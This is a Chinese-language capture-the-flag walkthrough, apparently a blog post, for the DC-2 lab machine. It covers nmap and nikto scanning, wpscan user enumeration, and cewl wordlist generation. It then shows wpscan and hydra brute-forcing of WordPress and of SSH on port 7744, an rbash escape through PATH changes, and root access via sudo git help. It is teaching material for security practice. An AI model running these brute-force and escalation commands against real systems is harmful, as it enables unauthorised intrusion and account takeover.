arp-scan -l
![](https://i-blog.csdnimg.cn/blog_migrate/577e01ce775644f3a6e8708cef599aa4.png)
nmap -sV -p- 192.168.109.140
![](https://i-blog.csdnimg.cn/blog_migrate/c8a96d033cd764fdac68fdd08f38a6f9.png)
也可以执行如下命令 可以探测目标主机是否存活
nmap -T4 -sP 192.168.109.140
![](https://i-blog.csdnimg.cn/blog_migrate/770238ce4015d64d030ef7f6a9e3e00d.png)
也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下
nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt
![](https://i-blog.csdnimg.cn/blog_migrate/9817fb1f9517bb3c08ab4de8d3f2b96c.png)
想要访问可以进入如下目录
C:\Windows\System32\drivers\etc\hosts
![](https://i-blog.csdnimg.cn/blog_migrate/9a0a7970422030c0f3ea203a580d4318.png)
kali中的hosts文件也需要修改 增加如下记录
/etc/hosts
![](https://i-blog.csdnimg.cn/blog_migrate/cfbc27aee0cb7345a00eb27e3a0d5e22.png)
进入网页后 这个
wordpress的cms网站 这个网站除去漏洞 还是非常优秀的
此时直接访问相应的ip地址就可以直接访问相应的网站了 输入dc-2也可以
![](https://i-blog.csdnimg.cn/blog_migrate/4bd5c41214b03d2d024d99c8de84400f.png)
![](https://i-blog.csdnimg.cn/blog_migrate/99cdc25ac7f240f82cb1bbf8727d4463.png)
修改完hosts文件 然后可以访问以后 接下来可以尝试对其进行扫描 -o表示可以输出到一个文件中 -h后面可以写能被解析的域名 也可以直接写ip地址
nikto -h dc-2 -o nihao.txt
![](https://i-blog.csdnimg.cn/blog_migrate/1695b45fd8b4ebf7cbe7cf70f499cab5.png)
发现了/wp-login.php 直接访问进入一个用户名和密码的登录位置
http://dc-2/wp-login.php
![](https://i-blog.csdnimg.cn/blog_migrate/f73b3b713292e340cdbdd750708cfb02.png)
接下来我们需要扫描发现wordpress的用户
wpscan --url dc-2 -e u
(接下来是软件数据库更新问题的解决部分)
![](https://i-blog.csdnimg.cn/blog_migrate/96a11c430cfb1a87f25b73d75eb84256.png)
可以先下载包到本地
wget http://blog.dsb.ink/wpscan/wp.zip
mv wp.zip /var/www/html/
如果kali无法直接下载 可以windows直接访问
http://blog.dsb.ink/wpscan/wp.zip 再把这个文件放到/var/www/html下
![](https://i-blog.csdnimg.cn/blog_migrate/d1c04879e0fef4fce0907485fa0fb018.png)
![](https://i-blog.csdnimg.cn/blog_migrate/366fb929700442a33aced590a3d23001.png)
cd /var/www/html
unzip wp.zip
![](https://i-blog.csdnimg.cn/blog_migrate/eff8625862fdc82ff9fcde7ed2a3ba46.png)
dpkg -L wpscan | grep updater
![](https://i-blog.csdnimg.cn/blog_migrate/0c3d084724b5a2c753024571017dfd39.png)
![](https://i-blog.csdnimg.cn/blog_migrate/badbf81909f4cbf3d4707dc63d6e013c.png)
/usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
vim /usr/share/rubygems-integration/all/gems/wpscan-3.8.1/lib/wpscan/db/updater.rb
按住shift+冒号 然后输入 set number回车 之后我们找到81行
![](https://i-blog.csdnimg.cn/blog_migrate/6ed1ceabbd84d7158e6293894ae62d2d.png)
之后我们改成本机地址
![](https://i-blog.csdnimg.cn/blog_migrate/ecb052612abc30a773b2b33b8132e752.png)
接下来重启服务
service apache2 start
然后再去更新 就可以更新成功了
wpscan --update
![](https://i-blog.csdnimg.cn/blog_migrate/a9b4ad7fefdc04b2f7accade3c587cf4.png)
之后再继续刚才的操作
wpscan --url dc-2 -e u
![](https://i-blog.csdnimg.cn/blog_migrate/e4691a2041870b27096554108f9c5f92.png)
扫描到了三个用户 admin jerry tom
根据flag1的提示 提示我们使用软件
cewl
会搜集可能的密码 行文习惯等
cewl dc-2 -w pass.txt
![](https://i-blog.csdnimg.cn/blog_migrate/0b8015c493c7d0b1055323debdafabf0.png)
vi username.txt
此时用户名和密码都到位了
![](https://i-blog.csdnimg.cn/blog_migrate/c8205b9330bc845f105c34f0acaaab52.png)
接下来可以
用工具 可以专门用来破解wordpress
其会自动定位到后台的登录地址
并进行穷举破解wordpress模板的用户名和密码
wpscan --url dc-2 -U username.txt -P pass.txt
![](https://i-blog.csdnimg.cn/blog_migrate/545887d2aabbc645c5547a252aed26e2.png)
其实也可以使用神器burpsuite进行破解
接下来我们可以通过账户和密码尝试进行登录
![](https://i-blog.csdnimg.cn/blog_migrate/071662baca3c7721ac67f5ddabd7e96f.png)
![](https://i-blog.csdnimg.cn/blog_migrate/929abbf90ec361b3242870433a264c4e.png)
Tom的账户登录以后并没有什么内容 所以就不做演示了
接下来既然有字典 不妨再使用工具hydra对ssh的密码进行一下穷举破解 看会不会有意外收获
而且此时ssh的端口不是默认的22 已经被管理员修改了 所以需要-s指定端口
hydra -L username.txt -P pass.txt 192.168.109.140 ssh -s 7744
穷举成功获得ssh密码
![](https://i-blog.csdnimg.cn/blog_migrate/fe9e883a1d88fb25de6165341c798762.png)
接下来可以尝试登录ssh
ssh tom@192.168.109.140 -p 7744
![](https://i-blog.csdnimg.cn/blog_migrate/4f888553c2a23a9c000841b1629e4cee.png)
ls
![](https://i-blog.csdnimg.cn/blog_migrate/59cc766b5c0094f9a46e092d8a37b53c.png)
发现权限不够 连cat都用不了
接下来要尝试提权
echo $PATH #看一下自己是什么命令行
![](https://i-blog.csdnimg.cn/blog_migrate/d0478139ae16c051860ac39ed393930e.png)
ls usr/bin #确定一下自己可以使用什么命令
![](https://i-blog.csdnimg.cn/blog_migrate/05528bbc37cc7d7d2c4a05f4d47bb612.png)
vi flag3.txt
![](https://i-blog.csdnimg.cn/blog_migrate/d54bb57ba3be8450292e59793e55d93e.png)
根据提示 接下来要使用su进行提权
以下命令 按下键盘的a 就可以调用/bin/sh命令行
BASH_CMDS[a]=/bin/sh
![](https://i-blog.csdnimg.cn/blog_migrate/2354672acca3e62deae9143de9ac3907.png)
发现依然被禁用掉了
![](https://i-blog.csdnimg.cn/blog_migrate/56aeb83d25241f7d0e45c63df373bd2c.png)
接下来可以使用终极命令: 把高级权限的命令行也加到自己的path中
此时就可以使用cat了
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
![](https://i-blog.csdnimg.cn/blog_migrate/0c2fefb66eca5cddfd6985f73140aa80.png)
可以尝试提权到jerry
PS:经过尝试jerry的账户没有办法被直接ssh登录 但是通过tom的账户su后输入密码就可以成功切换账户
su jerry
#adipiscing
cd ~ #回到自己的home目录
![](https://i-blog.csdnimg.cn/blog_migrate/2e1728827a5dcd4da283f703b3bc5b61.png)
sudo -l #查看可以以root权限使用什么命令
![](https://i-blog.csdnimg.cn/blog_migrate/2e2157c84fe8bc79c76d88d27d05177d.png)
git提权 git在查看帮助文档的时候是可以敲命令的 在下面变白以后 命令前面加个感叹号即可
sudo git -p --help #这条命令有时候不能用
sudo git help config
![](https://i-blog.csdnimg.cn/blog_migrate/405b3985bfd8aa750fe8d4b2a490dc9d.png)
![](https://i-blog.csdnimg.cn/blog_migrate/29372d1349e0339c6b783a9a503c0ddd.png)
此时已经提权到root了 可以执行root权限了
![](https://i-blog.csdnimg.cn/blog_migrate/5007186391f5be44817b5fd70c303d85.png)
![](https://i-blog.csdnimg.cn/blog_migrate/9a9f0546449531626dc95f9b85305a64.png)
![](https://i-blog.csdnimg.cn/blog_migrate/a2c2e780c890223be0fb8a5835b9bd0b.png)
![](https://i-blog.csdnimg.cn/blog_migrate/feb7afd5082ad0ab5cf09d9513fe6b5b.png)
![](https://i-blog.csdnimg.cn/blog_migrate/db0b55183d06885b90160c04e5d4b10f.png)
![](https://i-blog.csdnimg.cn/blog_migrate/33417f4ffabb6821a8a56a26fa05a693.png)
![](https://i-blog.csdnimg.cn/blog_migrate/0466027686084b7a3f66e5ffbaaf272c.png)
本质是借用git的root权限执行命令
![](https://i-blog.csdnimg.cn/blog_migrate/cb0286e4ed7145f5d25ad6e8e027759e.png)
![](https://i-blog.csdnimg.cn/blog_migrate/4bf58ac6055337abea6836a33b8b9a3d.png)
![](https://i-blog.csdnimg.cn/blog_migrate/83ca95d63e94cce2aa0557d65f1cf83c.png)